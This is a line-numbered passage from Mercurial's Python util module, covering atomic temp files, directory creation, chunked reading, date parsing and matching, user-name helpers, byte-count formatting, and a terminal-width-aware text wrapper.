1763 1763 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1764 1764 os.utime(filename, (advanced, advanced))
1765 1765 else:
1766 1766 rename(self._tempname, filename)
1767 1767
1768 1768 def discard(self):
1769 1769 if not self._fp.closed:
1770 1770 try:
1771 1771 os.unlink(self._tempname)
1772 1772 except OSError:
1773 1773 pass
1774 1774 self._fp.close()
1775 1775
1776 1776 def __del__(self):
1777 1777 if safehasattr(self, '_fp'): # constructor actually did something
1778 1778 self.discard()
1779 1779
1780 1780 def __enter__(self):
1781 1781 return self
1782 1782
1783 1783 def __exit__(self, exctype, excvalue, traceback):
1784 1784 if exctype is not None:
1785 1785 self.discard()
1786 1786 else:
1787 1787 self.close()
1788 1788
1789 1789 def unlinkpath(f, ignoremissing=False):
1790 1790 """unlink and remove the directory if it is empty"""
1791 1791 if ignoremissing:
1792 1792 tryunlink(f)
1793 1793 else:
1794 1794 unlink(f)
1795 1795 # try removing directories that might now be empty
1796 1796 try:
1797 1797 removedirs(os.path.dirname(f))
1798 1798 except OSError:
1799 1799 pass
1800 1800
1801 1801 def tryunlink(f):
1802 1802 """Attempt to remove a file, ignoring ENOENT errors."""
1803 1803 try:
1804 1804 unlink(f)
1805 1805 except OSError as e:
1806 1806 if e.errno != errno.ENOENT:
1807 1807 raise
1808 1808
1809 1809 def makedirs(name, mode=None, notindexed=False):
1810 1810 """recursive directory creation with parent mode inheritance
1811 1811
1812 1812 Newly created directories are marked as "not to be indexed by
1813 1813 the content indexing service", if ``notindexed`` is specified
1814 1814 for "write" mode access.
1815 1815 """
1816 1816 try:
1817 1817 makedir(name, notindexed)
1818 1818 except OSError as err:
1819 1819 if err.errno == errno.EEXIST:
1820 1820 return
1821 1821 if err.errno != errno.ENOENT or not name:
1822 1822 raise
1823 1823 parent = os.path.dirname(os.path.abspath(name))
1824 1824 if parent == name:
1825 1825 raise
1826 1826 makedirs(parent, mode, notindexed)
1827 1827 try:
1828 1828 makedir(name, notindexed)
1829 1829 except OSError as err:
1830 1830 # Catch EEXIST to handle races
1831 1831 if err.errno == errno.EEXIST:
1832 1832 return
1833 1833 raise
1834 1834 if mode is not None:
1835 1835 os.chmod(name, mode)
1836 1836
1837 1837 def readfile(path):
1838 1838 with open(path, 'rb') as fp:
1839 1839 return fp.read()
1840 1840
1841 1841 def writefile(path, text):
1842 1842 with open(path, 'wb') as fp:
1843 1843 fp.write(text)
1844 1844
1845 1845 def appendfile(path, text):
1846 1846 with open(path, 'ab') as fp:
1847 1847 fp.write(text)
1848 1848
1849 1849 class chunkbuffer(object):
1850 1850 """Allow arbitrary sized chunks of data to be efficiently read from an
1851 1851 iterator over chunks of arbitrary size."""
1852 1852
1853 1853 def __init__(self, in_iter):
1854 1854 """in_iter is the iterator that's iterating over the input chunks."""
1855 1855 def splitbig(chunks):
1856 1856 for chunk in chunks:
1857 1857 if len(chunk) > 2**20:
1858 1858 pos = 0
1859 1859 while pos < len(chunk):
1860 1860 end = pos + 2 ** 18
1861 1861 yield chunk[pos:end]
1862 1862 pos = end
1863 1863 else:
1864 1864 yield chunk
1865 1865 self.iter = splitbig(in_iter)
1866 1866 self._queue = collections.deque()
1867 1867 self._chunkoffset = 0
1868 1868
1869 1869 def read(self, l=None):
1870 1870 """Read L bytes of data from the iterator of chunks of data.
1871 1871 Returns less than L bytes if the iterator runs dry.
1872 1872
1873 1873 If size parameter is omitted, read everything"""
1874 1874 if l is None:
1875 1875 return ''.join(self.iter)
1876 1876
1877 1877 left = l
1878 1878 buf = []
1879 1879 queue = self._queue
1880 1880 while left > 0:
1881 1881 # refill the queue
1882 1882 if not queue:
1883 1883 target = 2**18
1884 1884 for chunk in self.iter:
1885 1885 queue.append(chunk)
1886 1886 target -= len(chunk)
1887 1887 if target <= 0:
1888 1888 break
1889 1889 if not queue:
1890 1890 break
1891 1891
1892 1892 # The easy way to do this would be to queue.popleft(), modify the
1893 1893 # chunk (if necessary), then queue.appendleft(). However, for cases
1894 1894 # where we read partial chunk content, this incurs 2 dequeue
1895 1895 # mutations and creates a new str for the remaining chunk in the
1896 1896 # queue. Our code below avoids this overhead.
1897 1897
1898 1898 chunk = queue[0]
1899 1899 chunkl = len(chunk)
1900 1900 offset = self._chunkoffset
1901 1901
1902 1902 # Use full chunk.
1903 1903 if offset == 0 and left >= chunkl:
1904 1904 left -= chunkl
1905 1905 queue.popleft()
1906 1906 buf.append(chunk)
1907 1907 # self._chunkoffset remains at 0.
1908 1908 continue
1909 1909
1910 1910 chunkremaining = chunkl - offset
1911 1911
1912 1912 # Use all of unconsumed part of chunk.
1913 1913 if left >= chunkremaining:
1914 1914 left -= chunkremaining
1915 1915 queue.popleft()
1916 1916 # offset == 0 is enabled by block above, so this won't merely
1917 1917 # copy via ``chunk[0:]``.
1918 1918 buf.append(chunk[offset:])
1919 1919 self._chunkoffset = 0
1920 1920
1921 1921 # Partial chunk needed.
1922 1922 else:
1923 1923 buf.append(chunk[offset:offset + left])
1924 1924 self._chunkoffset += left
1925 1925 left -= chunkremaining
1926 1926
1927 1927 return ''.join(buf)
1928 1928
1929 1929 def filechunkiter(f, size=131072, limit=None):
1930 1930 """Create a generator that produces the data in the file size
1931 1931 (default 131072) bytes at a time, up to optional limit (default is
1932 1932 to read all data). Chunks may be less than size bytes if the
1933 1933 chunk is the last chunk in the file, or the file is a socket or
1934 1934 some other type of file that sometimes reads less data than is
1935 1935 requested."""
1936 1936 assert size >= 0
1937 1937 assert limit is None or limit >= 0
1938 1938 while True:
1939 1939 if limit is None:
1940 1940 nbytes = size
1941 1941 else:
1942 1942 nbytes = min(limit, size)
1943 1943 s = nbytes and f.read(nbytes)
1944 1944 if not s:
1945 1945 break
1946 1946 if limit:
1947 1947 limit -= len(s)
1948 1948 yield s
1949 1949
1950 1950 def makedate(timestamp=None):
1951 1951 '''Return a unix timestamp (or the current time) as a (unixtime,
1952 1952 offset) tuple based off the local timezone.'''
1953 1953 if timestamp is None:
1954 1954 timestamp = time.time()
1955 1955 if timestamp < 0:
1956 1956 hint = _("check your clock")
1957 1957 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1958 1958 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1959 1959 datetime.datetime.fromtimestamp(timestamp))
1960 1960 tz = delta.days * 86400 + delta.seconds
1961 1961 return timestamp, tz
1962 1962
1963 1963 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1964 1964 """represent a (unixtime, offset) tuple as a localized time.
1965 1965 unixtime is seconds since the epoch, and offset is the time zone's
1966 1966 number of seconds away from UTC.
1967 1967
1968 1968 >>> datestr((0, 0))
1969 1969 'Thu Jan 01 00:00:00 1970 +0000'
1970 1970 >>> datestr((42, 0))
1971 1971 'Thu Jan 01 00:00:42 1970 +0000'
1972 1972 >>> datestr((-42, 0))
1973 1973 'Wed Dec 31 23:59:18 1969 +0000'
1974 1974 >>> datestr((0x7fffffff, 0))
1975 1975 'Tue Jan 19 03:14:07 2038 +0000'
1976 1976 >>> datestr((-0x80000000, 0))
1977 1977 'Fri Dec 13 20:45:52 1901 +0000'
1978 1978 """
1979 1979 t, tz = date or makedate()
1980 1980 if "%1" in format or "%2" in format or "%z" in format:
1981 1981 sign = (tz > 0) and "-" or "+"
1982 1982 minutes = abs(tz) // 60
1983 1983 q, r = divmod(minutes, 60)
1984 1984 format = format.replace("%z", "%1%2")
1985 1985 format = format.replace("%1", "%c%02d" % (sign, q))
1986 1986 format = format.replace("%2", "%02d" % r)
1987 1987 d = t - tz
1988 1988 if d > 0x7fffffff:
1989 1989 d = 0x7fffffff
1990 1990 elif d < -0x80000000:
1991 1991 d = -0x80000000
1992 1992 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1993 1993 # because they use the gmtime() system call which is buggy on Windows
1994 1994 # for negative values.
1995 1995 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1996 1996 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1997 1997 return s
1998 1998
1999 1999 def shortdate(date=None):
2000 2000 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2001 2001 return datestr(date, format='%Y-%m-%d')
2002 2002
2003 2003 def parsetimezone(s):
2004 2004 """find a trailing timezone, if any, in string, and return a
2005 2005 (offset, remainder) pair"""
2006 2006
2007 2007 if s.endswith("GMT") or s.endswith("UTC"):
2008 2008 return 0, s[:-3].rstrip()
2009 2009
2010 2010 # Unix-style timezones [+-]hhmm
2011 2011 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2012 2012 sign = (s[-5] == "+") and 1 or -1
2013 2013 hours = int(s[-4:-2])
2014 2014 minutes = int(s[-2:])
2015 2015 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2016 2016
2017 2017 # ISO8601 trailing Z
2018 2018 if s.endswith("Z") and s[-2:-1].isdigit():
2019 2019 return 0, s[:-1]
2020 2020
2021 2021 # ISO8601-style [+-]hh:mm
2022 2022 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2023 2023 s[-5:-3].isdigit() and s[-2:].isdigit()):
2024 2024 sign = (s[-6] == "+") and 1 or -1
2025 2025 hours = int(s[-5:-3])
2026 2026 minutes = int(s[-2:])
2027 2027 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2028 2028
2029 2029 return None, s
2030 2030
2031 2031 def strdate(string, format, defaults=None):
2032 2032 """parse a localized time string and return a (unixtime, offset) tuple.
2033 2033 if the string cannot be parsed, ValueError is raised."""
2034 2034 if defaults is None:
2035 2035 defaults = {}
2036 2036
2037 2037 # NOTE: unixtime = localunixtime + offset
2038 2038 offset, date = parsetimezone(string)
2039 2039
2040 2040 # add missing elements from defaults
2041 2041 usenow = False # default to using biased defaults
2042 2042 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2043 2043 part = pycompat.bytestr(part)
2044 2044 found = [True for p in part if ("%"+p) in format]
2045 2045 if not found:
2046 2046 date += "@" + defaults[part][usenow]
2047 2047 format += "@%" + part[0]
2048 2048 else:
2049 2049 # We've found a specific time element, less specific time
2050 2050 # elements are relative to today
2051 2051 usenow = True
2052 2052
2053 2053 timetuple = time.strptime(encoding.strfromlocal(date),
2054 2054 encoding.strfromlocal(format))
2055 2055 localunixtime = int(calendar.timegm(timetuple))
2056 2056 if offset is None:
2057 2057 # local timezone
2058 2058 unixtime = int(time.mktime(timetuple))
2059 2059 offset = unixtime - localunixtime
2060 2060 else:
2061 2061 unixtime = localunixtime + offset
2062 2062 return unixtime, offset
2063 2063
2064 2064 def parsedate(date, formats=None, bias=None):
2065 2065 """parse a localized date/time and return a (unixtime, offset) tuple.
2066 2066
2067 2067 The date may be a "unixtime offset" string or in one of the specified
2068 2068 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2069 2069
2070 2070 >>> parsedate(b' today ') == parsedate(
2071 2071 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2072 2072 True
2073 2073 >>> parsedate(b'yesterday ') == parsedate(
2074 2074 ... (datetime.date.today() - datetime.timedelta(days=1)
2075 2075 ... ).strftime('%b %d').encode('ascii'))
2076 2076 True
2077 2077 >>> now, tz = makedate()
2078 2078 >>> strnow, strtz = parsedate(b'now')
2079 2079 >>> (strnow - now) < 1
2080 2080 True
2081 2081 >>> tz == strtz
2082 2082 True
2083 2083 """
2084 2084 if bias is None:
2085 2085 bias = {}
2086 2086 if not date:
2087 2087 return 0, 0
2088 2088 if isinstance(date, tuple) and len(date) == 2:
2089 2089 return date
2090 2090 if not formats:
2091 2091 formats = defaultdateformats
2092 2092 date = date.strip()
2093 2093
2094 2094 if date == 'now' or date == _('now'):
2095 2095 return makedate()
2096 2096 if date == 'today' or date == _('today'):
2097 2097 date = datetime.date.today().strftime(r'%b %d')
2098 2098 date = encoding.strtolocal(date)
2099 2099 elif date == 'yesterday' or date == _('yesterday'):
2100 2100 date = (datetime.date.today() -
2101 2101 datetime.timedelta(days=1)).strftime(r'%b %d')
2102 2102 date = encoding.strtolocal(date)
2103 2103
2104 2104 try:
2105 2105 when, offset = map(int, date.split(' '))
2106 2106 except ValueError:
2107 2107 # fill out defaults
2108 2108 now = makedate()
2109 2109 defaults = {}
2110 2110 for part in ("d", "mb", "yY", "HI", "M", "S"):
2111 2111 # this piece is for rounding the specific end of unknowns
2112 2112 b = bias.get(part)
2113 2113 if b is None:
2114 2114 if part[0:1] in "HMS":
2115 2115 b = "00"
2116 2116 else:
2117 2117 b = "0"
2118 2118
2119 2119 # this piece is for matching the generic end to today's date
2120 2120 n = datestr(now, "%" + part[0:1])
2121 2121
2122 2122 defaults[part] = (b, n)
2123 2123
2124 2124 for format in formats:
2125 2125 try:
2126 2126 when, offset = strdate(date, format, defaults)
2127 2127 except (ValueError, OverflowError):
2128 2128 pass
2129 2129 else:
2130 2130 break
2131 2131 else:
2132 2132 raise error.ParseError(_('invalid date: %r') % date)
2133 2133 # validate explicit (probably user-specified) date and
2134 2134 # time zone offset. values must fit in signed 32 bits for
2135 2135 # current 32-bit linux runtimes. timezones go from UTC-12
2136 2136 # to UTC+14
2137 2137 if when < -0x80000000 or when > 0x7fffffff:
2138 2138 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2139 2139 if offset < -50400 or offset > 43200:
2140 2140 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2141 2141 return when, offset
2142 2142
2143 2143 def matchdate(date):
2144 2144 """Return a function that matches a given date match specifier
2145 2145
2146 2146 Formats include:
2147 2147
2148 2148 '{date}' match a given date to the accuracy provided
2149 2149
2150 2150 '<{date}' on or before a given date
2151 2151
2152 2152 '>{date}' on or after a given date
2153 2153
2154 2154 >>> p1 = parsedate(b"10:29:59")
2155 2155 >>> p2 = parsedate(b"10:30:00")
2156 2156 >>> p3 = parsedate(b"10:30:59")
2157 2157 >>> p4 = parsedate(b"10:31:00")
2158 2158 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2159 2159 >>> f = matchdate(b"10:30")
2160 2160 >>> f(p1[0])
2161 2161 False
2162 2162 >>> f(p2[0])
2163 2163 True
2164 2164 >>> f(p3[0])
2165 2165 True
2166 2166 >>> f(p4[0])
2167 2167 False
2168 2168 >>> f(p5[0])
2169 2169 False
2170 2170 """
2171 2171
2172 2172 def lower(date):
2173 2173 d = {'mb': "1", 'd': "1"}
2174 2174 return parsedate(date, extendeddateformats, d)[0]
2175 2175
2176 2176 def upper(date):
2177 2177 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2178 2178 for days in ("31", "30", "29"):
2179 2179 try:
2180 2180 d["d"] = days
2181 2181 return parsedate(date, extendeddateformats, d)[0]
2182 2182 except Abort:
2183 2183 pass
2184 2184 d["d"] = "28"
2185 2185 return parsedate(date, extendeddateformats, d)[0]
2186 2186
2187 2187 date = date.strip()
2188 2188
2189 2189 if not date:
2190 2190 raise Abort(_("dates cannot consist entirely of whitespace"))
2191 2191 elif date[0] == "<":
2192 2192 if not date[1:]:
2193 2193 raise Abort(_("invalid day spec, use '<DATE'"))
2194 2194 when = upper(date[1:])
2195 2195 return lambda x: x <= when
2196 2196 elif date[0] == ">":
2197 2197 if not date[1:]:
2198 2198 raise Abort(_("invalid day spec, use '>DATE'"))
2199 2199 when = lower(date[1:])
2200 2200 return lambda x: x >= when
2201 2201 elif date[0] == "-":
2202 2202 try:
2203 2203 days = int(date[1:])
2204 2204 except ValueError:
2205 2205 raise Abort(_("invalid day spec: %s") % date[1:])
2206 2206 if days < 0:
2207 2207 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2208 2208 % date[1:])
2209 2209 when = makedate()[0] - days * 3600 * 24
2210 2210 return lambda x: x >= when
2211 2211 elif " to " in date:
2212 2212 a, b = date.split(" to ")
2213 2213 start, stop = lower(a), upper(b)
2214 2214 return lambda x: x >= start and x <= stop
2215 2215 else:
2216 2216 start, stop = lower(date), upper(date)
2217 2217 return lambda x: x >= start and x <= stop
2218 2218
2219 2219 def stringmatcher(pattern, casesensitive=True):
2220 2220 """
2221 2221 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2222 2222 returns the matcher name, pattern, and matcher function.
2223 2223 missing or unknown prefixes are treated as literal matches.
2224 2224
2225 2225 helper for tests:
2226 2226 >>> def test(pattern, *tests):
2227 2227 ... kind, pattern, matcher = stringmatcher(pattern)
2228 2228 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2229 2229 >>> def itest(pattern, *tests):
2230 2230 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2231 2231 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2232 2232
2233 2233 exact matching (no prefix):
2234 2234 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2235 2235 ('literal', 'abcdefg', [False, False, True])
2236 2236
2237 2237 regex matching ('re:' prefix)
2238 2238 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2239 2239 ('re', 'a.+b', [False, False, True])
2240 2240
2241 2241 force exact matches ('literal:' prefix)
2242 2242 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2243 2243 ('literal', 're:foobar', [False, True])
2244 2244
2245 2245 unknown prefixes are ignored and treated as literals
2246 2246 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2247 2247 ('literal', 'foo:bar', [False, False, True])
2248 2248
2249 2249 case insensitive regex matches
2250 2250 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2251 2251 ('re', 'A.+b', [False, False, True])
2252 2252
2253 2253 case insensitive literal matches
2254 2254 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2255 2255 ('literal', 'ABCDEFG', [False, False, True])
2256 2256 """
2257 2257 if pattern.startswith('re:'):
2258 2258 pattern = pattern[3:]
2259 2259 try:
2260 2260 flags = 0
2261 2261 if not casesensitive:
2262 2262 flags = remod.I
2263 2263 regex = remod.compile(pattern, flags)
2264 2264 except remod.error as e:
2265 2265 raise error.ParseError(_('invalid regular expression: %s')
2266 2266 % e)
2267 2267 return 're', pattern, regex.search
2268 2268 elif pattern.startswith('literal:'):
2269 2269 pattern = pattern[8:]
2270 2270
2271 2271 match = pattern.__eq__
2272 2272
2273 2273 if not casesensitive:
2274 2274 ipat = encoding.lower(pattern)
2275 2275 match = lambda s: ipat == encoding.lower(s)
2276 2276 return 'literal', pattern, match
2277 2277
2278 2278 def shortuser(user):
2279 2279 """Return a short representation of a user name or email address."""
2280 2280 f = user.find('@')
2281 2281 if f >= 0:
2282 2282 user = user[:f]
2283 2283 f = user.find('<')
2284 2284 if f >= 0:
2285 2285 user = user[f + 1:]
2286 2286 f = user.find(' ')
2287 2287 if f >= 0:
2288 2288 user = user[:f]
2289 2289 f = user.find('.')
2290 2290 if f >= 0:
2291 2291 user = user[:f]
2292 2292 return user
2293 2293
2294 2294 def emailuser(user):
2295 2295 """Return the user portion of an email address."""
2296 2296 f = user.find('@')
2297 2297 if f >= 0:
2298 2298 user = user[:f]
2299 2299 f = user.find('<')
2300 2300 if f >= 0:
2301 2301 user = user[f + 1:]
2302 2302 return user
2303 2303
2304 2304 def email(author):
2305 2305 '''get email of author.'''
2306 2306 r = author.find('>')
2307 2307 if r == -1:
2308 2308 r = None
2309 2309 return author[author.find('<') + 1:r]
2310 2310
2311 2311 def ellipsis(text, maxlength=400):
2312 2312 """Trim string to at most maxlength (default: 400) columns in display."""
2313 2313 return encoding.trim(text, maxlength, ellipsis='...')
2314 2314
2315 2315 def unitcountfn(*unittable):
2316 2316 '''return a function that renders a readable count of some quantity'''
2317 2317
2318 2318 def go(count):
2319 2319 for multiplier, divisor, format in unittable:
2320 2320 if abs(count) >= divisor * multiplier:
2321 2321 return format % (count / float(divisor))
2322 2322 return unittable[-1][2] % count
2323 2323
2324 2324 return go
2325 2325
2326 2326 def processlinerange(fromline, toline):
2327 2327 """Check that linerange <fromline>:<toline> makes sense and return a
2328 2328 0-based range.
2329 2329
2330 2330 >>> processlinerange(10, 20)
2331 2331 (9, 20)
2332 2332 >>> processlinerange(2, 1)
2333 2333 Traceback (most recent call last):
2334 2334 ...
2335 2335 ParseError: line range must be positive
2336 2336 >>> processlinerange(0, 5)
2337 2337 Traceback (most recent call last):
2338 2338 ...
2339 2339 ParseError: fromline must be strictly positive
2340 2340 """
2341 2341 if toline - fromline < 0:
2342 2342 raise error.ParseError(_("line range must be positive"))
2343 2343 if fromline < 1:
2344 2344 raise error.ParseError(_("fromline must be strictly positive"))
2345 2345 return fromline - 1, toline
2346 2346
2347 2347 bytecount = unitcountfn(
2348 2348 (100, 1 << 30, _('%.0f GB')),
2349 2349 (10, 1 << 30, _('%.1f GB')),
2350 2350 (1, 1 << 30, _('%.2f GB')),
2351 2351 (100, 1 << 20, _('%.0f MB')),
2352 2352 (10, 1 << 20, _('%.1f MB')),
2353 2353 (1, 1 << 20, _('%.2f MB')),
2354 2354 (100, 1 << 10, _('%.0f KB')),
2355 2355 (10, 1 << 10, _('%.1f KB')),
2356 2356 (1, 1 << 10, _('%.2f KB')),
2357 2357 (1, 1, _('%.0f bytes')),
2358 2358 )
2359 2359
2360 2360 # Matches a single EOL which can either be a CRLF where repeated CR
2361 2361 # are removed or a LF. We do not care about old Macintosh files, so a
2362 2362 # stray CR is an error.
2363 2363 _eolre = remod.compile(br'\r*\n')
2364 2364
2365 2365 def tolf(s):
2366 2366 return _eolre.sub('\n', s)
2367 2367
2368 2368 def tocrlf(s):
2369 2369 return _eolre.sub('\r\n', s)
2370 2370
2371 2371 if pycompat.oslinesep == '\r\n':
2372 2372 tonativeeol = tocrlf
2373 2373 fromnativeeol = tolf
2374 2374 else:
2375 2375 tonativeeol = pycompat.identity
2376 2376 fromnativeeol = pycompat.identity
2377 2377
2378 2378 def escapestr(s):
2379 2379 # call underlying function of s.encode('string_escape') directly for
2380 2380 # Python 3 compatibility
2381 2381 return codecs.escape_encode(s)[0]
2382 2382
2383 2383 def unescapestr(s):
2384 2384 return codecs.escape_decode(s)[0]
2385 2385
2386 2386 def forcebytestr(obj):
2387 2387 """Portably format an arbitrary object (e.g. exception) into a byte
2388 2388 string."""
2389 2389 try:
2390 2390 return pycompat.bytestr(obj)
2391 2391 except UnicodeEncodeError:
2392 2392 # non-ascii string, may be lossy
2393 2393 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2394 2394
2395 2395 def uirepr(s):
2396 2396 # Avoid double backslash in Windows path repr()
2397 2397 return repr(s).replace('\\\\', '\\')
2398 2398
2399 2399 # delay import of textwrap
2400 2400 def MBTextWrapper(**kwargs):
2401 2401 class tw(textwrap.TextWrapper):
2402 2402 """
2403 2403 Extend TextWrapper for width-awareness.
2404 2404
2405 2405 Neither number of 'bytes' in any encoding nor 'characters' is
2406 2406 appropriate to calculate terminal columns for specified string.
2407 2407
2408 2408 Original TextWrapper implementation uses built-in 'len()' directly,
2409 2409 so overriding is needed to use width information of each characters.
2410 2410
2411 2411 In addition, characters classified into 'ambiguous' width are
2412 2412 treated as wide in East Asian area, but as narrow in other.
2413 2413
2414 2414 This requires use decision to determine width of such characters.
2415 2415 """
2416 2416 def _cutdown(self, ucstr, space_left):
2417 2417 l = 0
2418 2418 colwidth = encoding.ucolwidth
2419 2419 for i in xrange(len(ucstr)):
2420 2420 l += colwidth(ucstr[i])
2421 2421 if space_left < l:
2422 2422 return (ucstr[:i], ucstr[i:])
2423 2423 return ucstr, ''
2424 2424
2425 2425 # overriding of base class
2426 2426 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2427 2427 space_left = max(width - cur_len, 1)
2428 2428
2429 2429 if self.break_long_words:
2430 2430 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2431 2431 cur_line.append(cut)
2432 2432 reversed_chunks[-1] = res
2433 2433 elif not cur_line:
2434 2434 cur_line.append(reversed_chunks.pop())
2435 2435
2436 2436 # this overriding code is imported from TextWrapper of Python 2.6
2437 2437 # to calculate columns of string by 'encoding.ucolwidth()'
2438 2438 def _wrap_chunks(self, chunks):
2439 2439 colwidth = encoding.ucolwidth
2440 2440
2441 2441 lines = []
2442 2442 if self.width <= 0:
2443 2443 raise ValueError("invalid width %r (must be > 0)" % self.width)
2444 2444
2445 2445 # Arrange in reverse order so items can be efficiently popped
2446 2446 # from a stack of chucks.
2447 2447 chunks.reverse()
2448 2448
2449 2449 while chunks:
2450 2450
2451 2451 # Start the list of chunks that will make up the current line.
2452 2452 # cur_len is just the length of all the chunks in cur_line.
2453 2453 cur_line = []
2454 2454 cur_len = 0
2455 2455
2456 2456 # Figure out which static string will prefix this line.
2457 2457 if lines:
2458 2458 indent = self.subsequent_indent
2459 2459 else:
2460 2460 indent = self.initial_indent
2461 2461
2462 2462 # Maximum width for this line.
2463 2463 width = self.width - len(indent)
2464 2464
2465 2465 # First chunk on line is whitespace -- drop it, unless this
2466 2466 # is the very beginning of the text (i.e. no lines started yet).
2467 2467 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2468 2468 del chunks[-1]
2469 2469
2470 2470 while chunks:
2471 2471 l = colwidth(chunks[-1])
2472 2472
2473 2473 # Can at least squeeze this chunk onto the current line.
2474 2474 if cur_len + l <= width:
2475 2475 cur_line.append(chunks.pop())
2476 2476 cur_len += l
2477 2477
2478 2478 # Nope, this line is full.
2479 2479 else:
2480 2480 break
2481 2481
2482 2482 # The current line is full, and the next chunk is too big to
2483 2483 # fit on *any* line (not just this one).
2484 2484 if chunks and colwidth(chunks[-1]) > width:
2485 2485 self._handle_long_word(chunks, cur_line, cur_len, width)
2486 2486
2487 2487 # If the last chunk on this line is all whitespace, drop it.
2488 2488 if (self.drop_whitespace and
2489 2489 cur_line and cur_line[-1].strip() == r''):
2490 2490 del cur_line[-1]
2491 2491
2492 2492 # Convert current line back to a string and store it in list
2493 2493 # of all lines (return value).
2494 2494 if cur_line:
2495 2495 lines.append(indent + r''.join(cur_line))
2496 2496
2497 2497 return lines
2498 2498
2499 2499 global MBTextWrapper
2500 2500 MBTextWrapper = tw
2501 2501 return tw(**kwargs)
2502 2502
2503 2503 def wrap(line, width, initindent='', hangindent=''):
2504 2504 maxindent = max(len(hangindent), len(initindent))
2505 2505 if width <= maxindent:
2506 2506 # adjust for weird terminal size
2507 2507 width = max(78, maxindent + 1)
2508 2508 line = line.decode(pycompat.sysstr(encoding.encoding),
2509 2509 pycompat.sysstr(encoding.encodingmode))
2510 2510 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2511 2511 pycompat.sysstr(encoding.encodingmode))
2512 2512 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2513 2513 pycompat.sysstr(encoding.encodingmode))
2514 2514 wrapper = MBTextWrapper(width=width,
2515 2515 initial_indent=initindent,
2516 2516 subsequent_indent=hangindent)
2517 2517 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2518 2518
2519 2519 if (pyplatform.python_implementation() == 'CPython' and
2520 2520 sys.version_info < (3, 0)):
2521 2521 # There is an issue in CPython that some IO methods do not handle EINTR
2522 2522 # correctly. The following table shows what CPython version (and functions)
2523 2523 # are affected (buggy: has the EINTR bug, okay: otherwise):
2524 2524 #
2525 2525 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2526 2526 # --------------------------------------------------
2527 2527 # fp.__iter__ | buggy | buggy | okay
2528 2528 # fp.read* | buggy | okay [1] | okay
2529 2529 #
2530 2530 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2531 2531 #
2532 2532 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2533 2533 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2534 2534 #
2535 2535 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2536 2536 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2537 2537 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2538 2538 # fp.__iter__ but not other fp.read* methods.
2539 2539 #
2540 2540 # On modern systems like Linux, the "read" syscall cannot be interrupted
2541 2541 # when reading "fast" files like on-disk files. So the EINTR issue only
2542 2542 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2543 2543 # files approximately as "fast" files and use the fast (unsafe) code path,
2544 2544 # to minimize the performance impact.
2545 2545 if sys.version_info >= (2, 7, 4):
2546 2546 # fp.readline deals with EINTR correctly, use it as a workaround.
2547 2547 def _safeiterfile(fp):
2548 2548 return iter(fp.readline, '')
2549 2549 else:
2550 2550 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2551 2551 # note: this may block longer than necessary because of bufsize.
2552 2552 def _safeiterfile(fp, bufsize=4096):
2553 2553 fd = fp.fileno()
2554 2554 line = ''
2555 2555 while True:
2556 2556 try:
2557 2557 buf = os.read(fd, bufsize)
2558 2558 except OSError as ex:
2559 2559 # os.read only raises EINTR before any data is read
2560 2560 if ex.errno == errno.EINTR:
2561 2561 continue
2562 2562 else:
2563 2563 raise
2564 2564 line += buf
2565 2565 if '\n' in buf:
2566 2566 splitted = line.splitlines(True)
2567 2567 line = ''
2568 2568 for l in splitted:
2569 2569 if l[-1] == '\n':
2570 2570 yield l
2571 2571 else:
2572 2572 line = l
2573 2573 if not buf:
2574 2574 break
2575 2575 if line:
2576 2576 yield line
2577 2577
2578 2578 def iterfile(fp):
2579 2579 fastpath = True
2580 2580 if type(fp) is file:
2581 2581 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2582 2582 if fastpath:
2583 2583 return fp
2584 2584 else:
2585 2585 return _safeiterfile(fp)
2586 2586 else:
2587 2587 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2588 2588 def iterfile(fp):
2589 2589 return fp
2590 2590
2591 2591 def iterlines(iterator):
2592 2592 for chunk in iterator:
